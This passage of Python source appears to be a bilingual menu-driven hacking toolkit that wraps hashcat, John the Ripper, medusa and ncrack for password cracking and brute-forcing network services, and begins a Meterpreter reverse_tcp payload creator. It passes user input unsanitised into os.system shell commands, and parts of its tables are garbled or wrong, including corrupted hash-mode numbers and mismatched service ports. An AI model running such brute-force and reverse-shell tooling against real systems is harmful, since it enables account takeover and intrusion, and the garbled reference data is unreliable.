PBKDF2-SHA1 | Network Protocols\n 2500 | WPA-EAPOL-PBKDF2 | Network Protocols\n 2501 | WPA-EAPOL-PMK | Network Protocols\n 22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols\n 22001 | WPA-PMK-PMKID+EAPOL | Network Protocols\n 16800 | WPA-PMKID-PBKDF2 | Network Protocols\n 16801 | WPA-PMKID-PMK | Network Protocols\n 7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols\n 10200 | CRAM-MD5 | Network Protocols\n 4800 | iSCSI CHAP authentication, MD5(CHAP) | Network Protocols\n 16500 | JWT (JSON Web Token) | Network Protocols\n 22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols\n 22301 | Telegram Mobile App Passcode (SHA256) | Network Protocols\n 7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols\n 13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols\n 18200 | Kerberos 5, etype 23, AS-REP | Network Protocols\n 19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols\n 19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols\n 19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols\n 1back00 | Kerberos 5, etype 18, Pre-Auth | Network Protocols\n 5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols\n 5600 | NetNTLMv2 | Network Protocols\n 23 | Skype | Network Protocols\n 11100 | PostgreSQL CRAM (MD5) | Network Protocols\n 11200 | MySQL CRAM (SHA1) | Network Protocols\n 8500 | RACF | Operating System\n 6300 | AIX {smd5} | Operating System\n 6700 | AIX {ssha1} | Operating System\n 6400 | AIX {ssha256} | Operating System\n 6500 | AIX {ssha512} | Operating System\n 3000 | LM | Operating System\n 19000 | QNX /etc/shadow (MD5) | Operating System\n 19100 | QNX /etc/shadow (SHA256) | Operating System\n 19200 | QNX /etc/shadow (SHA512) | Operating System\n 15300 | DPAPI masterkey file v1 | Operating System\n 15900 | DPAPI masterkey file v2 | Operating System\n 7200 | GRUB 2 | Operating System\n 12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System\n 12400 | BSDi Crypt, Extended DES | Operating System\n 1000 | NTLM | Operating System\n 122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System\n 1722 | macOS v10.7 | Operating System\n 7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System\n back00 | Radmin2 | Operating System\n 5800 | Samsung Android Password/PIN | Operating System\n 3200 | bcrypt $2*$, Blowfish (Unix) | Operating System\n 500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System\n 1500 | descrypt, DES (Unix), Traditional DES | Operating System\n 7400 | sha256crypt $5$, SHA256 (Unix) | Operating System\n 1800 | sha512crypt $6$, SHA512 (Unix) | Operating System\n 13800 | Windows Phone 8+ PIN/password | Operating System\n 2410 | Cisco-ASA MD5 | Operating System\n 9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System\n 9300 | Cisco-IOS $9$ (scrypt) | Operating System\n 5700 | Cisco-IOS type 4 (SHA256) | Operating System\n 2400 | Cisco-PIX MD5 | Operating System\n 8100 | Citrix NetScaler (SHA1) | Operating System\n 22200 | Citrix NetScaler (SHA512) | Operating System\n 1100 | Domain Cached Credentials (DCC), MS Cache | Operating System\n 2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | Operating System\n 7000 | FortiGate (FortiOS) | Operating System\n 125 | ArubaOS | Operating System\n 501 | Juniper IVE | Operating System\n 22 | Juniper NetScreen/SSG (ScreenOS) | Operating System\n 15100 | Juniper/NetBSD sha1crypt | Operating System\n 131 | MSSQL (2000) | Database Server\n 132 | MSSQL (2005) | Database Server\n 1731 | MSSQL (2012, 2014) | Database Server\n 12 | PostgreSQL | Database Server\n 3100 | Oracle H: Type (Oracle 7+) | Database Server\n 112 | Oracle S: Type (Oracle 11+) | Database Server\n 12300 | Oracle T: Type (Oracle 12+) | Database Server\n 7401 | MySQL $A$ (sha256crypt) | Database Server\n 200 | MySQL323 | Database Server\n 300 | MySQL4.1/MySQL5 | Database Server\n 8000 | Sybase ASE | Database Server\n 1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server\n 8300 | DNSSEC (NSEC3) | FTP, HTTP, SMTP, LDAP Server\n 16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server\n 1411 | SSHA-256(Base64), LDAP {SSHA256} | FTP, HTTP, SMTP, LDAP Server\n 1711 | SSHA-512(Base64), LDAP {SSHA512} | FTP, HTTP, SMTP, LDAP Server\n 10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server\n 15000 | FileZilla Server >= 0.9.55 | FTP, HTTP, SMTP, LDAP Server\n 12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server\n 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server\n 141 | Episerver 6.x < .NET 4 | FTP, HTTP, SMTP, LDAP Server\n 1441 | Episerver 6.x >= .NET 4 | FTP, HTTP, SMTP, LDAP Server\n 101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server\n 111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server\n 7700 | SAP CODVN B (BCODE) | Enterprise Application Software (EAS)\n 7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)\n 7800 | SAP CODVN F/G (PASSCODE) | Enterprise Application Software (EAS)\n 7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)\n 10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | Enterprise Application Software (EAS)\n 133 | PeopleSoft | Enterprise Application Software (EAS)\n 13500 | PeopleSoft PS_TOKEN | Enterprise Application Software (EAS)\n 21500 | SolarWinds Orion | Enterprise Application Software (EAS)\n 8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)\n 8700 | Lotus Notes/Domino 6 | Enterprise Application Software (EAS)\n 9100 | Lotus Notes/Domino 8 | Enterprise Application Software (EAS)\n 20600 | Oracle Transportation Management (SHA256) | Enterprise Application Software (EAS)\n 4711 | Huawei sha1(md5($pass).$salt) | Enterprise Application Software (EAS)\n 20711 | AuthMe sha256 | Enterprise Application Software (EAS)\n 12200 | eCryptfs | Full-Disk Encryption (FDE)\n 22400 | AES Crypt (SHA256) | Full-Disk Encryption (FDE)\n 14600 | LUKS | Full-Disk Encryption (FDE)\n 13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)\n 13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)\n 13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)\n 13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)\n 13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)\n 13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)\n 16700 | FileVault 2 | Full-Disk Encryption (FDE)\n 20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 22100 | BitLocker | Full-Disk Encryption (FDE)\n 12900 | Android FDE (Samsung DEK) | Full-Disk Encryption (FDE)\n 8800 | Android FDE <= 4.3 | Full-Disk Encryption (FDE)\n 18300 | Apple File System (APFS) | Full-Disk Encryption (FDE)\n 6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)\n 6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)\n 6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)\n 6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)\n 6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)\n 10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | Documents\n 10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | Documents\n 10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | Documents\n 10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | Documents\n 10600 | PDF 1.7 Level 3 (Acrobat 9) | Documents\n 10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | Documents\n 9400 | MS Office 2007 | Documents\n 9500 | MS Office 2010 | Documents\n 9600 | MS Office 2013 | Documents\n 9700 | MS Office <= 2003 $0/$1, MD5 + RC4 | Documents\n 9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 | Documents\n 9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 | Documents\n 9800 | MS Office <= 2003 $3/$4, SHA1 + RC4 | Documents\n 9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1 | Documents\n 9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2 | Documents\n 18400 | Open Document Format (ODF) 1.2 (SHA-256, AES) | Documents\n 18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents\n 16200 | Apple Secure Notes | Documents\n 15500 | JKS Java Key Store Private Keys (SHA1) | Password Managers\n 6600 | 1Password, agilekeychain | Password Managers\n 8200 | 1Password, cloudkeychain | Password Managers\n 9000 | Password Safe v2 | Password Managers\n 5200 | Password Safe v3 | Password Managers\n 6800 | LastPass + LastPass sniffed | Password Managers\n 13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Managers\n 11300 | Bitcoin/Litecoin wallet.dat | Password Managers\n 16600 | Electrum Wallet (Salt-Type 1-3) | Password Managers\n 21700 | Electrum Wallet (Salt-Type 4) | Password Managers\n 21800 | Electrum Wallet (Salt-Type 5) | Password Managers\n 12700 | Blockchain, My Wallet | Password Managers\n 15200 | Blockchain, My Wallet, V2 | Password Managers\n 18800 | Blockchain, My Wallet, Second Password (SHA256) | Password Managers\n 23100 | Apple Keychain | Password Managers\n 16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers\n 15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers\n 15700 | Ethereum Wallet, SCRYPT | Password Managers\n 22500 | MultiBit Classic .key (MD5) | Password Managers\n 22700 | MultiBit HD (scrypt) | Password Managers\n 11600 | 7-Zip | Archives\n 12500 | RAR3-hp | Archives\n 13000 | RAR5 | Archives\n 17200 | PKZIP (Compressed) | Archives\n 17220 | PKZIP (Compressed Multi-File) | Archives\n 17225 | PKZIP (Mixed Multi-File) | Archives\n 17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives\n 17210 | PKZIP (Uncompressed) | Archives\n 20500 | PKZIP Master Key | Archives\n 20510 | PKZIP Master Key (6 byte optimization) | Archives\n 14700 | iTunes backup < 10.0 | Archives\n 14800 | iTunes backup >= 10.0 | Archives\n 23001 | SecureZIP AES-128 | Archives\n 23002 | SecureZIP AES-192 | Archives\n 23003 | SecureZIP AES-256 | Archives\n 13600 | WinZip | Archives\n 18900 | Android Backup | Archives\n 13200 | AxCrypt | Archives\n 13300 | AxCrypt in-memory SHA1 | Archives\n 8400 | WBB3 (Woltlab Burning Board) | Forums, CMS, E-Commerce\n 2611 | vBulletin < v3.8.5 | Forums, CMS, E-Commerce\n 2711 | vBulletin >= v3.8.5 | Forums, CMS, E-Commerce\n 2612 | PHPS | Forums, CMS, E-Commerce\n 121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce\n 3711 | MediaWiki B type | Forums, CMS, E-Commerce\n 4521 | Redmine | Forums, CMS, E-Commerce\n 11 | Joomla < 2.5.18 | Forums, CMS, E-Commerce\n 13900 | OpenCart | Forums, CMS, E-Commerce\n 11000 | PrestaShop | Forums, CMS, E-Commerce\n 16000 | Tripcode | Forums, CMS, E-Commerce\n 7900 | Drupal7 | Forums, CMS, E-Commerce\n 21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce\n 4522 | PunBB | Forums, CMS, E-Commerce\n 2811 | MyBB 1.2+, IPB2+ (Invision Power Board) | Forums, CMS, E-Commerce\n 18100 | TOTP (HMAC-SHA1) | One-Time Passwords\n 2000 | STDOUT | Plaintext\nbackback9 | Plaintext | Plaintext\n 21600 | Web2py pbkdf2-sha512 | Framework\n 10000 | Django (PBKDF2-SHA256) | Framework\n 124 | Django (SHA-1) | Framework\n")
elif "--brute" in uinput.lower():
print("? | \x1b[33mCharset\x1b[37m\n==+=========\nl | abcdefghijklmnopqrstuvwxyzu | ABCDEFGHIJKLMNOPQRSTUVWXYZ\nd | 0123456789\nh | 0123456789abcdef\nH | 0123456789ABCDEF\ns | !#*+,-.^_`{|}\na | ?l?u?d?s\nb | 0x00 - 0xff\n\n\x1b[33mUsage:\x1b[37m\n\x1b[33m======\x1b[37m\n\x1b[32mex:\x1b[37m mert123* = ?l?l?l?l?d?d?d?s\n\x1b[32mex:\x1b[37m mert123* = ?a?a?a?a?a?a?a?a")
elif "run" == uinput.lower():
print("\x1b[1m\x1b[31m'Command not found. You can check the run command by typing 'info'\x1b[1m")
elif "run -w" == uinput.lower():
os.system("sudo hashcat -a 0 -m " + hashmode + " " + hash + " " + wordlist)
elif "run -b" == uinput.lower():
os.system("sudo hashcat -a 3 -m " + hashmode + " " + hash + " " + bruteforce)
def john():
hashlist = " "
search = " "
format = " "
wordlist = " "
hash = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[john]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mIt breaks one-way encryption algorithms (hashes) with wordlist.\nUsage:\nYou do not need to fill in \x1b[36m'LIST'\x1b[37m to see the hash list. Just type \x1b[36m'run --hash list' \x1b[37mor \x1b[36m'run -hl'\x1b[37m.\nTo search in the hash list, fill in \x1b[36m'FIND'\x1b[37m and type \x1b[32m'run --search' \x1b[36mor\x1b[37m 'run -s'\x1b[37m.\nTo hash hash using Wordlist, fill in \x1b[36m'FORMAT'\x1b[37m, \x1b[36m'WORDLIST'\x1b[37m and \x1b[36m'HASH'\x1b[37m and type \x1b[36m'run -x'\x1b[37m.\n\n\x1b[33mTR:\x1b[37mWordlist ile tek yönlü şifreleme algoritmalarını (hashes) kırar. \nKullanımı:\nHash listesini görmek için \x1b[36m'LIST'\x1b[37m kısmını doldurmanıza gerek yoktur. Sadece \x1b[36m'run --hash list'\x1b[37m ya da \x1b[36m'run -hl'\x1b[37m yazın.\nHash listesi içerisinde arama yapmak için \x1b[36m'FIND'\x1b[37m kısmını doldurun ve \x1b[36m'run --search'\x1b[37m or \x1b[36m'run -s'\x1b[37m yazın.\nWordlist kullanarak hash kırmak için \x1b[36m'FORMAT'\x1b[37m, \x1b[36m'WORDLIST'\x1b[37m ve \x1b[36m'HASH'\x1b[37m kısımlarını doldurup \x1b[36m'run -x'\x1b[37m yazın.\n")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nLIST {} NO Lists hashes that can be cracked. \x1b[33musage: 'run --hash list' or 'run -hl'\x1b[37m\nFIND {} NO Searches within breakable hashes \x1b[32mex: MD5\x1b[37m \x1b[33musage: 'run --search' or 'run -s'\x1b[37m\nFORMAT {} YES Specify the hash format \x1b[32mex: Raw-MD5\x1b[37m\nWORDLIST{} YES Specify the wordlist you will use to crack the hash \x1b[32mex: /root/Desktop/wordlist.txt\x1b[37m\nHASH {} YES Enter the file with hash in it \x1b[32mex: /root/Desktop/hash.txt\x1b[37m".format(hashlist[::-1],search,format,wordlist,hash))
elif "set list" in uinput.lower():
hashlist = uinput
hashlist = hashlist.replace("set list ","").replace("set LIST ","").replace("SET list ","").replace("SET LIST ","").center(25)
elif "set find" in uinput.lower():
search = uinput
search = search.replace("set find ","").replace("set FIND ","").replace("SET find ","").replace("SET FIND ","").center(25)
elif "set format" in uinput.lower():
format = uinput
format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(25)
elif "set wordlist" in uinput.lower():
wordlist = uinput
wordlist = wordlist.replace("set wordlist ","").replace("set WORDLIST ","").replace("SET wordlist ","").replace("SET WORDLIST ","").center(25)
elif "set hash" in uinput.lower():
hash = uinput
hash = hash.replace("set hash ","").replace("set HASH ","").replace("SET hash ","").replace("SET HASH ","").center(25)
elif "run" == uinput.lower():
print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
elif "run --hash list" == uinput.lower() or "run -hl" == uinput.lower():
os.system("john --list=formats")
elif "run --search" == uinput.lower() or "run -s" == uinput.lower():
os.system("john --list=formats | grep -i " + search.strip())
elif "run -x" == uinput.lower():
os.system("john --format=" + format.strip() + " --wordlist=" + wordlist.strip() + " " + hash.strip())
def medusa():
ip = " "
service = " "
userlist = " "
passlist = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[medusa]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mWordlist attack on services.\n\x1b[33mTR:\x1b[37mServislere yönelik wordlist saldırısı.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m\nSERVICE {} YES Which service? \x1b[32mex: ftp\x1b[37m\nUSERLIST {} YES Enter a wordlist with usernames \x1b[32mex: /root/Desktop/username.txt\x1b[37m\nPASSLIST {} YES Enter a wordlist with passwords \x1b[32mex: /root/Desktop/passwords.txt\x1b[37m".format(ip,service,userlist,passlist))
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "set service" in uinput.lower():
service = uinput
service = service.replace("set service ","").replace("set SERVICE ","").replace("SET service ","").replace("SET SERVICE ","").center(25)
elif "set userlist" in uinput.lower():
userlist = uinput
userlist = userlist.replace("set userlist ","").replace("set USERLIST ","").replace("SET userlist ","").replace("SET USERLIST ","").center(25)
elif "set passlist" in uinput.lower():
passlist = uinput
passlist = passlist.replace("set passlist ","").replace("set PASSLIST ","").replace("SET passlist ","").replace("SET PASSLIST ","").center(25)
elif "run" == uinput.lower():
os.system("sudo medusa -h " + ip.strip() + " -M " + service.strip() + " -U " + userlist.strip() + " -P " + passlist.strip())
print("Process Completed")
def ncrack():
ip = " "
port = " "
userlist = " "
passlist = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[ncrack]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mWordlist attack on services.\n\x1b[33mTR:\x1b[37mServislere yönelik wordlist saldırısı.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m\nPORT {} YES Which service? Type \x1b[33m'--services and ports' \x1b[35mor\x1b[33m '-sap'\x1b[37m to see the ports used by the services. \x1b[32mex: ftp\x1b[37m\nUSERLIST {} YES Enter a word list with usernames in it \x1b[32mex: /root/Desktop/username.txt\x1b[37m\nPASSLIST {} YES Enter a word list with passwords \x1b[32mex: /root/Desktop/passwords.txt\x1b[37m".format(ip,port,userlist,passlist))
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "set port" in uinput.lower():
port = uinput
port = port.replace("set port ","").replace("set PORT ","").replace("SET port ","").replace("SET PORT ","").center(25)
elif "set userlist" in uinput.lower():
userlist = uinput
userlist = userlist.replace("set userlist ","").replace("set USERLIST ","").replace("SET userlist ","").replace("SET USERLIST ","").center(25)
elif "set passlist" in uinput.lower():
passlist = uinput
passlist = passlist.replace("set passlist ","").replace("set PASSLIST ","").replace("SET passlist ","").replace("SET PASSLIST ","").center(25)
elif "--services and ports" == uinput.lower() or "-sap" == uinput.lower():
print("\x1b[1m\nFTP = \x1b[33m21\x1b[37m\nSSH = \x1b[33m22\x1b[37m\nTelnet = \x1b[33m23\x1b[37m\nVNC = \x1b[33m5900\x1b[37m\nRPD = \x1b[33m3989\x1b[37m\nMySQL = \x1b[33m3306\x1b[37m\nPostgreSQL = \x1b[33m5432\x1b[37m\nMSSQL = \x1b[33z1433\x1b[37m\nMongoDB = \x1b[33m27017\x1b[37m\nSMB = \x1b[33m'139' \x1b[35mor\x1b[33m '445'\x1b[37m\nHTTP(S) = \x1b[33m'80' \x1b[35mor\x1b[33m '443'\x1b[37m\nPOP3(S) = \x1b[33m'110' \x1b[35mor\x1b[33m '995'\x1b[37m\nIMAP = \x1b[33m143\x1b[37m\nCVS = \x1b[33m2401\x1b[37m\nMQTT = \x1b[33m143\x1b[37m\nDICOM = \x1b[33m1883\x1b[37m\nSIP = \x1b[33m5060\x1b[37m\nRedis = \x1b[33m6379\x1b[37m\nCassandra = \x1b[33m9042\x1b[37m\n")
elif "run" == uinput.lower():
os.system("sudo ncrack -p " + port.strip() + " -U " + userlist.strip() + " -P " + passlist.strip() + " " + ip.strip())
print("Process Completed")
def hashIdentifier():
search = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[hash-identifier]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mHash Identifier is a tool that detects the encrypted hash algorithm. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mHash Identifier, kriptolanan hash/şifre algoritmasını tespit eden bir araçtır. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nSEARCH{} YES Hash value \x1b[32mex: 55e8bb2e1b456ebbec8ae5ba64311a2c\x1b[37m".format(search))
elif "set search" in uinput.lower():
search = uinput
search = search.replace("set search ","").replace("set SEARCH ","").replace("SET search ","").replace("SET SEARCH ","").center(50)
elif "run" == uinput.lower():
os.system("hash-identifier " + search.strip())
print("Process Completed")
elif "run -f" == uinput.lower():
os.system("hashid " + search.strip())
print("Process Completed")
def wordlists():
kernel = os.popen('uname -v').read().split(" ")[3]
if "kali" in kernel:
while 1:
os.system("clear")
print("\x1b[1m\n\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[33mWordlist Files\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[37m\n\n\x1b[0m\x1b[2m")
os.system("locate wordlist")
print("\x1b[1m\n\n\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[33mWordlist Directories\x1b[31m*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\x1b[37m\n\n\x1b[0m\x1b[2m")
os.system("cd /usr/share/wordlists && ls -l")
print("\x1b[1m")
r = input('Press "q" to exit\n\n\x1b[1m\033[36m[mksec]\033[36m[wordlist]\033[37m\x1b[0m ')
if r == "q":
os.system("clear")
passwordAttacks()
else:
while 1:
print("\x1b[1m\x1b[36mEN:\x1b[31mOnly for those using the kali linux operating system.\n\x1b[36mTR:\x1b[31mSadece kali linux işletim sistemini kullananlar için.")
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[wordlist]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
def PayloadCreatorAndListener():
def PayloadCreater():
payload = " windows/meterpreter/reverse_tcp "
host = " <IP> "
port = " 4444 "
format = " exe "
output = " "
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[payload_creator]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a payload creator. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mBir payload üretme aracıdır. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPAYLOAD{} YES Type '--list payloads' or '-lp' to see payloads \x1b[32mDefault: windows/meterpreter/reverse_tcp\x1b[37m\nLHOST {} YES Your IP address = \x1b[32m{}\x1b[37m\nLPORT {} YES Type in port \x1b[32mDefault = 4444\x1b[37m\nFORMAT {} YES Specify the payload format \x1b[32mDefault = exe\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/mksec.exe\x1b[37m".format(payload,host,ipv4,port,format,output))
elif "set payload" in uinput.lower():
payload = uinput
payload = payload.replace("set payload ","").replace("set PAYLOAD ","").replace("SET payload ","").replace("SET PAYLOAD ","").center(50)
elif "set lhost" in uinput.lower():
host = uinput
host = host.replace("set lhost ","").replace("set LHOST ","").replace("SET lhost ","").replace("SET LHOST ","").center(50)
elif "set port" in uinput.lower():
port = uinput
port = port.replace("set lport ","").replace("set LPORT ","").replace("SET lport ","").replace("SET LPORT ","").center(50)
elif "set format" in uinput.lower():
format = uinput
format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(50).lower()
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(50)
elif "--list payload" in uinput.lower() or "-lp" == uinput.lower():
